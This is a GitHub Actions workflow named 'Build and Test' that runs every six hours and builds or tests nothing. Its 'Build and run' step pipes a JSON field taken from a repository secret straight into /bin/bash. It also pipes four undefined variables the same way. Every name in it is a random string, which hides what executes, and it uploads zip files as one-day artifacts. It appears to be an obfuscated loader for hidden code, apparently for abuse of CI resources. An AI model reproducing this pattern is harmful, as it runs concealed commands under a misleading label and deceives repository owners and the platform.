name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '50 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          sii8: ${{ secrets.sii8 }}
        run: |
          printf '%s' "$sii8" | jq -r .yu05 | /bin/bash
          echo $ickk70455 | jq -r .p7 | /bin/bash
          echo $e699 | jq -r .ervj4525 | /bin/bash
          printf '%s' "$kg680" | jq -r .l303 | /bin/bash
          echo $fqvg5 | jq -r .s743 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Go06epgO
          path: "*.zip"
          retention-days: 1
